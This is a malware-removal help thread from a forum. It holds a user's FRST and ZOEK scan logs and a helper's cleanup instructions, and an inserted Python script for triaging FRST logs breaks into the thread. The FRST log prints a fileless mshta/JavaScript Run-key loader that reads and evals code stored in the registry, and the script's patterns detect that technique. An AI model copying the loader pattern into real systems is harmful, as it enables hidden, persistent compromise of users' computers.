Help removing malware

Hi there

I was hoping for some help in removing malware. Avast has been pinging like mad since this morning. Avast doesn’t seem to remove it even when I run a system scan.

Have run a Farbar Recovery Scan Tool test as recommended elsewhere on the forum. I’ve pasted the results below in the hope that someone might be able to help with eradicating the problem. Thanks in advance for any suggestions :slight_smile:

FRST.txt

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 21-06-2015 01
Ran by home (administrator) on HOME-PC on 22-06-2015 11:49:14
Running from C:\Users\home\Desktop
Loaded Profiles: home (Available Profiles: home & Remote)
Platform: Microsoft Windows 7 Professional Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
() C:\Program Files\Web Connection\Y855_EE\BackgroundService\ServiceManager.exe
(LogMeIn, Inc.) C:\Program Files\LogMeIn\x86\LMIGuardianSvc.exe
(DEVGURU Co., LTD.) C:\Program Files\SAMSUNG\USB Drivers\25_escape\conn\ss_conn_service.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(LogMeIn, Inc.) C:\Program Files\LogMeIn\x86\LogMeInSystray.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe
() C:\Program Files\VTech\DownloadManager\System\AgentMonitor.exe
(FTR Pty. Ltd.) C:\Program Files\FTR\ForTheRecord\FTRSearchFolders.exe
() C:\Program Files\Web Connection\Y855_EE\BackgroundService\ModemListener.exe
(Microsoft Corporation) C:\Windows\WindowsMobile\wmdcBase.exe
(TomTom) C:\Program Files\MyDrive Connect\TomTom MyDrive Connect.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(NCH Software) C:\Program Files\NCH Software\Scribe\scribe.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil32_14_0_0_125_ActiveX.exe
(Microsoft Corporation) C:\Windows\System32\wuauclt.exe
(FileZilla Project) C:\Users\home\Downloads\FileZilla_3.7.1_win32\FileZilla-3.7.1\filezilla.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM.…\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [946352 2012-12-03] (Adobe Systems Incorporated)
HKLM.…\Run: [LogMeIn GUI] => C:\Program Files\LogMeIn\x86\LogMeInSystray.exe [63048 2013-04-30] (LogMeIn, Inc.)
HKLM.…\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM.…\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5227648 2015-03-30] (AVAST Software)
HKLM.…\Run: [AgentMonitor] => C:\Program Files\VTech\DownloadManager\System\AgentMonitor.exe [391040 2014-04-17] ()
HKLM.…\Run: [FTR Search Folders] => C:\Program Files\FTR\ForTheRecord\FTRSearchFolders.exe [94208 2012-12-06] (FTR Pty. Ltd.)
HKLM.…\Run: [MSRS] => C:\Program Files\NCH Software\MSRS\msrs.exe [1067524 2014-12-11] (NCH Software)
HKLM.…\Run: [EE MORPHO ModemListener] => C:\Program Files\Web Connection\Y855_EE\BackgroundService\ModemListener.exe [159056 2014-05-16] ()
HKLM.…\Run: [Windows Mobile-based device management] => C:\Windows\WindowsMobile\wmdcBase.exe [648072 2007-05-31] (Microsoft Corporation)
HKLM.…\Run: [**ae5247d6<>] => mshta javascript:qF3FqNEcm=“zX6biHBz2U”;P3Y=new%20ActiveXObject(“WScript.Shell”);AD9hXrw=“1EafLBrD”;cvk4J6=P3Y.RegRead(“HKLM\software\ae8c3fee\6fecae9c”);m1t9pCUD=“71P5TNR”;eval(cvk4J6);C2BueEz3="6 (the data entry has 7 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM.…\Policies\Explorer\Run: [] =>
HKU\S-1-5-21-1304999761-2293218496-246315724-1000.…\Run: [MyDriveConnect.exe] => C:\Program Files\MyDrive Connect\TomTom MyDrive Connect.exe [1905032 2015-04-28] (TomTom)
HKU\S-1-5-21-1304999761-2293218496-246315724-1000.…\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [5503768 2015-02-19] (Piriform Ltd)
HKU\S-1-5-21-1304999761-2293218496-246315724-1000.…\MountPoints2: {48b0afcb-e586-11e3-9bdf-001e4fd3631b} - F:\InnoTabSetup.exe
HKU\S-1-5-21-1304999761-2293218496-246315724-1000.…\MountPoints2: {eae30f1f-a85c-11e4-b8fc-001e4fd3631b} - F:\autorun.exe
HKU\S-1-5-18.…\Run: [**ae5247d6<>] => mshta javascript:x6kvoQz4=“rLhTIzQy”;v2N=new%20ActiveXObject(“WScript.Shell”);FFfUbEV5=“VuLd”;u4z7kO=v2N.RegRead(“HKCU\software\ae8c3fee\6fecae9c”);hgRf2bBNH=“s7Vqtqu05i”;eval(u4z7kO);YB7XtxSd="CxK (the data entry has 2 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM.…\AppCertDlls: [x64] → c:\program files\settings manager\smdmf\x64\sysapcrt.dll
ShellIconOverlayIdentifiers: [00avast] → {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2014-12-31] (AVAST Software)
CHR HKU\S-1-5-21-1304999761-2293218496-246315724-1000\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKU\S-1-5-21-1304999761-2293218496-246315724-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.co.uk/
HKU\S-1-5-21-1304999761-2293218496-246315724-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://uk.msn.com/?ocid=iehp
SearchScopes: HKLM → {9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} URL = http://www.default-search.net/search?sid=492&aid=345&itype=a&ver=15005&tm=577&src=ds&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1304999761-2293218496-246315724-1000 → {9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} URL = http://www.default-search.net/search?sid=492&aid=345&itype=a&ver=15005&tm=577&src=ds&p={searchTerms}
BHO: Adobe PDF Link Helper → {18DF081C-E8AD-4283-A596-FA578C2EBDC3} → C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-12-18] (Adobe Systems Incorporated)
BHO: Java™ Plug-In SSV Helper → {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} → C:\Program Files\Java\jre7\bin\ssv.dll [2013-10-08] (Oracle Corporation)
BHO: avast! Online Security → {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} → C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2014-12-31] (AVAST Software)
BHO: Java™ Plug-In 2 SSV Helper → {DBC80044-A445-435b-BC74-9C25C1C588A9} → C:\Program Files\Java\jre7\bin\jp2ssv.dll [2013-10-08] (Oracle Corporation)
Toolbar: HKU\S-1-5-21-1304999761-2293218496-246315724-1000 → No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File
DPF: {1ABA5FAC-1417-422B-BA82-45C35E2C908B} http://kitchenplanner.ikea.com/JP/Core/Player/2020PlayerAX_IKEA_Win32.cab
DPF: {8A5BE387-D09A-4DFA-A56B-DCB89BD11468} https://spaces.diy.com/2020Spaces_main/UI/idealSpaces/AE/AppEngine/RoomEngine/Core/Player/2020PlayerAX_WEB_Win32.cab
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254

FireFox:

FF ProfilePath: C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default
FF NewTab: about:newtab
FF DefaultSearchEngine: Google (avast)
FF DefaultSearchUrl: https://www.google.com/search/?trackid=sp-006
FF SearchEngineOrder.1: Google (avast)
FF SelectedSearchEngine: Google (avast)
FF Homepage: https://www.google.com/?trackid=sp-006
FF Keyword.URL: https://www.google.com/search/?trackid=sp-006
FF Plugin: @adobe.com/FlashPlayer → C:\Windows\system32\Macromed\Flash\NPSWF32_11_4_402_265.dll [2012-09-01] ()
FF Plugin: @java.com/DTPlugin,version=10.45.2 → C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll [2013-10-08] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.45.2 → C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2013-10-08] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE → disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 → c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 → C:\Program Files\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-19] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 → C:\Program Files\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-19] (Google Inc.)
FF Plugin: Adobe Reader → C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2013-02-15] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2013-02-15] (Adobe Systems Inc.)
FF SearchPlugin: C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default\searchplugins\askcom.xml [2013-03-04]
FF SearchPlugin: C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default\searchplugins\default-search.xml [2014-12-30]
FF SearchPlugin: C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default\searchplugins\google-avast.xml [2015-02-22]
FF SearchPlugin: C:\Program Files\mozilla firefox\searchplugins\default-search.xml [2014-12-30]
FF HKLM.…\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2013-12-06]

Chrome:

CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\40.0.2214.115\PepperFlash\pepflashplayer.dll No File
CHR Plugin: (Shockwave Flash) - C:\Windows\system32\Macromed\Flash\NPSWF32_11_4_402_265.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\40.0.2214.115\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\40.0.2214.115\pdf.dll No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll No File
CHR Plugin: (Java™ Platform SE 7 U9) - C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (Java Deployment Toolkit 7.0.70.10) - C:\Windows\system32\npDeployJava1.dll No File
CHR Profile: C:\Users\home\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\home\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-11-27]
CHR Extension: (Google Cast) - C:\Users\home\AppData\Local\Google\Chrome\User Data\Default\Extensions\boadgeojelhgndaghljhdicfkmllpafd [2014-11-27]
CHR Extension: (Avast Online Security) - C:\Users\home\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2014-09-08]
CHR Extension: (Google Wallet) - C:\Users\home\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-10-10]
CHR HKLM.…\Chrome\Extension: [fgbcffenncokfocljomejddmgcpppjom] - https://clients2.google.com/service/update2/crx
CHR HKLM.…\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2014-12-31]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [50344 2014-12-31] (AVAST Software)
R2 EE MORPHO Modem Device Helper; C:\Program Files\Web Connection\Y855_EE\BackgroundService\ServiceManager.exe [58192 2013-06-18] ()
S2 MSRSService; C:\Program Files\NCH Software\MSRS\msrs.exe [1067524 2014-12-11] (NCH Software) [File not signed]
R2 ss_conn_service; C:\Program Files\Samsung\USB Drivers\25_escape\conn\ss_conn_service.exe [743688 2014-10-13] (DEVGURU Co., LTD.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2009-07-14] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [24184 2014-12-31] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [70384 2014-12-31] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [81768 2014-12-31] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\Drivers\aswRvrt.sys [49944 2014-12-31] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [787800 2014-12-31] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [423784 2014-12-31] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [91496 2014-12-31] (AVAST Software)
R0 aswVmm; C:\Windows\system32\Drivers\aswVmm.sys [206248 2014-12-31] ()
R2 DgiVecp; C:\Windows\system32\Drivers\DgiVecp.sys [38400 2009-06-09] (Samsung Electronics Co., Ltd.) [File not signed]
S4 DNE; C:\Windows\System32\DRIVERS\dne2000.sys [131984 2008-11-16] (Deterministic Networks, Inc.)
R3 e1express; C:\Windows\System32\DRIVERS\e1e6232.sys [219352 2009-06-05] (Intel Corporation)
R2 SSPORT; C:\Windows\system32\Drivers\SSPORT.sys [5120 2008-01-10] (Samsung Electronics) [File not signed]
S4 LMIRfsClientNP; No ImagePath
S3 SWVNIC; system32\DRIVERS\swvnic.sys

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-06-22 11:28 - 2015-06-22 11:29 - 00034577 _____ C:\Users\home\Desktop\Addition.txt
2015-06-22 11:27 - 2015-06-22 11:49 - 00014309 _____ C:\Users\home\Desktop\FRST.txt
2015-06-22 11:27 - 2015-06-22 11:49 - 00000000 ____D C:\FRST
2015-06-22 11:26 - 2015-06-22 11:26 - 01148928 _____ (Farbar) C:\Users\home\Desktop\FRST.exe
2015-06-19 08:55 - 2015-06-19 08:55 - 00000396 _____ C:\Windows\PFRO.log
2015-05-31 17:06 - 2015-05-31 17:06 - 00000000 ____D C:\Users\home\Desktop\Enforcement of right of way

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-06-22 11:43 - 2013-06-25 17:39 - 00000000 ____D C:\Users\home\Documents*** work
2015-06-22 11:11 - 2012-11-06 11:42 - 00000886 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-06-22 11:03 - 2009-07-14 05:34 - 00020720 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-06-22 11:03 - 2009-07-14 05:34 - 00020720 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-06-22 11:00 - 2012-09-09 23:34 - 00000000 ____D C:\Users\home\AppData\Roaming\FileZilla
2015-06-22 10:59 - 2012-08-20 20:43 - 01277635 _____ C:\Windows\WindowsUpdate.log
2015-06-22 10:56 - 2015-03-09 10:21 - 00019408 _____ C:\Windows\setupact.log
2015-06-22 10:56 - 2012-11-06 11:42 - 00000882 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-06-22 10:56 - 2009-07-14 05:53 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-06-20 18:23 - 2015-03-16 10:50 - 00000000 ____D C:\Users\home\Documents*l
2015-06-20 16:28 - 2012-09-09 23:07 - 00000000 ____D C:\Users\home\Documents\My docs
2015-06-20 14:04 - 2013-05-03 16:54 - 00000000 ____D C:\Users\home\Documents\Scanned docs
2015-06-19 12:32 - 2015-04-23 12:10 - 00000000 ____D C:\Users\home\Documents*
LLP
2015-06-06 17:31 - 2009-07-14 05:52 - 00000000 ____D C:\Windows\system32\FxsTmp
2015-06-05 17:33 - 2012-10-24 16:20 - 00000000 ____D C:\Users\home\Documents***
2015-06-05 12:48 - 2015-03-16 11:56 - 00000000 ____D C:\Users\home\Documents***
2015-05-27 16:59 - 2012-08-20 20:48 - 00726316 _____ C:\Windows\system32\PerfStringBackup.INI

==================== Files in the root of some directories =======

2012-08-20 21:01 - 2012-08-20 21:01 - 0000040 _____ () C:\Users\home\AppData\Roaming\burnaware.ini
2014-05-27 11:09 - 2014-05-27 11:11 - 0000581 _____ () C:\Users\home\AppData\Local\cookies.ini
2013-05-03 16:44 - 2013-05-03 16:44 - 0000057 _____ () C:\ProgramData\Ament.ini
2012-08-20 21:47 - 2012-08-20 21:47 - 0001534 _____ () C:\ProgramData\ss.ini

Files to move or delete:

C:\Users\home\CTX.DAT

Some files in TEMP:

C:\Users\Remote\AppData\Local\Temp\AskSLib.dll

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2015-06-15 08:26

==================== End of log ============================
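The two Run entries FRST marks with ATTENTION above launch mshta with an inline javascript: URL whose only job is to RegRead a second registry value and eval it, so the real payload never sits in a file that a scanner can quarantine; that is consistent with Avast alerting repeatedly without clearing it. As an added triage aid (not part of this thread and not FRST's own code), the script below parses the Registry section of an FRST log and flags exactly that pattern, plus any AppCertDlls load point; the sample lines are constructed in FRST's format with placeholder value names and RegRead subkeys.

```python
"""Triage the 'Registry (Whitelisted)' section of an FRST log for autostart
entries that launch a script host with inline code, or that pull their real
payload out of a registry value (RegRead + eval) instead of a file on disk.
Added example for this thread; not FRST's own code and not a removal tool."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample in FRST's line format. The Run value names and the subkeys
# read by RegRead are placeholders, not the values from the thread's log; "<>"
# stands in for the unprintable bytes behind FRST's "invalid characters" note.
SAMPLE_LOG = r"""
==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [946352 2012-12-03] (Adobe Systems Incorporated)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5227648 2015-03-30] (AVAST Software)
HKLM\...\Run: [**PLACEHOLDER<>] => mshta javascript:a="x";s=new%20ActiveXObject("WScript.Shell");p=s.RegRead("HKLM\software\PLACEHOLDER\PLACEHOLDER");eval(p); <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Policies\Explorer\Run: [] =>
HKU\S-1-5-18\...\Run: [**PLACEHOLDER<>] => mshta javascript:eval(new%20ActiveXObject("WScript.Shell").RegRead("HKCU\software\PLACEHOLDER\PLACEHOLDER")); <===== ATTENTION (Value Name with invalid characters)
HKLM\...\AppCertDlls: [x64] -> c:\program files\settings manager\smdmf\x64\sysapcrt.dll

==================== Internet (Whitelisted) ====================

HKU\S-1-5-18\...\Run: [Outside] => mshta javascript:eval(1) (constructed: outside the Registry section, must be ignored)
"""

SECTION_RE = re.compile(r"^=+\s*(?P<title>.*?)\s*=+$")
ENTRY_RE = re.compile(
    r"^(?P<hive>HKLM|HKU\\S-[\d-]+)\\\.\.\.\\(?P<key>[^:]+): "
    r"\[(?P<name>[^\]]*)\] (?:=>|->)\s*(?P<data>.*)$"
)
REGREAD_RE = re.compile(r'RegRead\(["“]([^"”]+)["”]\)')
SCRIPT_HOSTS = {"mshta", "wscript", "cscript", "powershell", "rundll32"}
HIGH = {"inline_script", "registry_resident_payload"}


@dataclass
class Finding:
    hive: str
    key: str
    name: str
    data: str
    reasons: List[str] = field(default_factory=list)
    payload_key: Optional[str] = None  # registry value the script reads its code from

    @property
    def severity(self) -> str:
        return "high" if HIGH & set(self.reasons) else "medium"


def assess(hive: str, key: str, name: str, data: str, raw_line: str) -> Finding:
    """Apply the heuristics to one parsed autostart entry."""
    f = Finding(hive, key, name, data)
    if "ATTENTION" in raw_line:             # FRST's own flag on the line
        f.reasons.append("frst_attention")
    if any(c in "<>" or not c.isprintable() for c in name):
        f.reasons.append("odd_value_name")  # names chosen to be hard to display or type
    head = data.split(None, 1)[0].strip('"').lower() if data else ""
    host = head.rsplit("\\", 1)[-1]
    host = host[:-4] if host.endswith(".exe") else host
    if host in SCRIPT_HOSTS and re.search(r"\b(?:javascript|vbscript):", data, re.I):
        f.reasons.append("inline_script")   # code lives in the Run value itself
    m = REGREAD_RE.search(data)
    if m and re.search(r"\beval\s*\(", data, re.I):
        f.reasons.append("registry_resident_payload")  # nothing on disk to quarantine
        f.payload_key = m.group(1)
    if key.lower() == "appcertdlls":
        f.reasons.append("appcertdlls_loadpoint")  # DLL loaded into newly created processes
    return f


def triage(log_text: str, section: str = "Registry (Whitelisted)") -> List[Finding]:
    """Walk the log, keep only the requested section, return flagged entries."""
    findings: List[Finding] = []
    in_section = False
    for raw in log_text.splitlines():
        line = raw.strip()
        header = SECTION_RE.match(line)
        if header:
            in_section = header.group("title") == section
            continue
        entry = ENTRY_RE.match(line) if in_section else None
        if not entry:
            continue
        f = assess(entry["hive"], entry["key"], entry["name"], entry["data"], line)
        if f.reasons:
            findings.append(f)
    return findings


def report(findings: List[Finding]) -> List[str]:
    """One analyst-readable line per finding."""
    lines = []
    for f in findings:
        extra = f" payload in {f.payload_key}" if f.payload_key else ""
        lines.append(f"[{f.severity}] {f.hive}\\...\\{f.key} [{f.name}]: "
                     f"{', '.join(f.reasons)}{extra}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(triage(SAMPLE_LOG))))
```

A flagged payload_key tells the analyst which registry value to export and review before removal; clearing only the Run value leaves the stored script in place for the next dropper.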

Hello,

Please attach reports. Thanks.

Hi TwinheadedEagle

Apologies for being thick, but how do I do that?

Sorry for being dim. I’ve figured out how to attach!

Scan with ZOEK

Please download ZOEK by Smeenk and save it to your desktop (preferred version is the *.exe one).
Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.

[*]Right-click on the Zoek icon and select Run as Administrator to start the tool.
[*]Wait patiently until the main console appears; it may take a minute or two.
[*]In the main box please paste in the following script:

createsrpoint;
autoclean;
emptyalltemp;
ipconfig /flushdns;b

[*]Make sure that Scan All Users option is checked.
[*]Push Run Script and wait patiently. The scan may take a couple of minutes.
[*]When the scan completes, a zoek-results logfile should open in notepad.
[*]If a reboot is needed, it will be opened after it. You may also find it at your main drive (usually C:\ drive)

Post its content into your next reply.

Hi TwinHeadedEagle, I’ve run ZOEK as you have outlined and the results are attached. During the course of ZOEK doing its business, Windows threw up a couple of error messages which I’ve also attached for good measure. Your help is much appreciated :slight_smile:

Did zoek finish?

Yes, it finished and, as you anticipated, needed to reboot before finalising.

Do you have report?

It should’ve been attached, but I’ve pasted it below in case it didn’t come up:

Zoek.exe v5.0.0.0 Updated 04-May-2015
Tool run by home on 22/06/2015 at 13:00:41.81.
Microsoft Windows 7 Professional 6.1.7601 Service Pack 1 x86
Running in: Normal Mode Internet Access Detected
Launched: C:\Users\home\Desktop\zoek.exe [Scan all users] [Script inserted]

==== System Restore Info ======================

22/06/2015 13:05:35 Zoek.exe System Restore Point Created Successfully.

==== Empty Folders Check ======================

C:\Program Files\Citrix deleted successfully
C:\Program Files\VideoLAN deleted successfully
C:\Program Files\Common Files\Soda PDF 5 deleted successfully
C:\PROGRA~2\Oracle deleted successfully
C:\PROGRA~2\PlotSoft deleted successfully
C:\Users\home\AppData\Roaming\Recordpad deleted successfully
C:\Users\home\AppData\Local\LogMeIn Rescue Applet deleted successfully
C:\Users\Remote\AppData\Local\VirtualStore deleted successfully

==== Deleting CLSID Registry Keys ======================

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes{9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} deleted successfully

==== Deleting CLSID Registry Values ======================

==== Deleting Services ======================

==== FireFox Fix ======================

ProfilePath: C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default

user.js not found
---- Lines ask.com modified from prefs.js ----

user_pref(“extensions.enabledAddons”, "wtxpcom@mybrowserbar.com:6.9,freerip@mybrowserbar.com:6.9,toolbar@ask.com:3.15.4.100015,{972ce4c6-7e08-4474-a28
---- Lines mybrowserbar modified from prefs.js ----

user_pref(“extensions.enabledAddons”, "wtxpcom@mybrowserbar.com:6.9,freerip@mybrowserbar.com:6.9,toolbar@disabled:3.15.4.100015,{972ce4c6-7e08-4474-a2
---- FireFox user.js and prefs.js backups ----

prefs_062015_1321_.backup

==== Batch Command(s) Run By Tool======================

==== Deleting Files \ Folders ======================

C:\Program Files\Citrix not found
C:\Program Files\VideoLAN not found
C:\Program Files\Design&Print deleted
C:\Program Files\Mozilla Firefox\searchplugins\default-search.xml deleted
C:\Program Files\NCH Software\Components\NCHToolbars deleted
C:\Program Files\FreeRIP deleted
C:\Program Files\Common Files\Spigot deleted
C:\Users\home\AppData\Roaming\FirefoxToolbar deleted
C:\Users\home\AppData\Roaming\burnaware.ini deleted
C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Browse and Search the Internet.lnk deleted
C:\PROGRA~2\FreeRIP deleted
C:\Users\home\AppData\Local\Linkey deleted
C:\Users\home\AppData\Local\cache deleted
C:\Users\home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FreeRIP deleted
C:\Users\home\Downloads\iLividSetup.exe deleted
C:\Users\home\Downloads\2965624 038078 2012 Mr Leo Ogoegbunam Oraegbu CCCSH Committee Bundle 20140710.doc deleted
C:\Users\home\AppData\LocalLow\DataMngr deleted
C:\Users\Remote\AppData\LocalLow\AskToolbar deleted
C:\Users\Remote\AppData\LocalLow\Search Settings deleted
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Application Updater deleted
C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default\searchplugins\askcom.xml deleted
C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default\searchplugins\default-search.xml deleted

==== Firefox Start and Search pages ======================

ProfilePath: C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default
user_pref(“browser.startup.homepage”, “https://www.google.com/?trackid=sp-006”);
user_pref(“browser.search.defaulturl”, “https://www.google.com/search/?trackid=sp-006”);
user_pref(“browser.newtab.url”, “about:newtab”);
user_pref(“browser.search.defaultengine”, “Google (avast)”);
user_pref(“browser.search.defaultenginename”, “Google (avast)”);
user_pref(“browser.search.selectedEngine”, “Google (avast)”);
user_pref(“keyword.URL”, “https://www.google.com/search/?trackid=sp-006”);

==== Firefox Extensions Registry ======================

[HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\Extensions]
wrc@avast.com”=“C:\Program Files\AVAST Software\Avast\WebRep\FF” [28/01/2015 10:11]

==== Firefox Extensions ======================

AppDir: C:\Program Files\Mozilla Firefox

  • Default - %AppDir%\extensions{972ce4c6-7e08-4474-a285-3208198ce6fd}

==== Firefox Plugins ======================

Profilepath: C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default
6768C724599214E4F9ADD9F8FF5097EB - C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll - Java™ Platform SE 7 U45
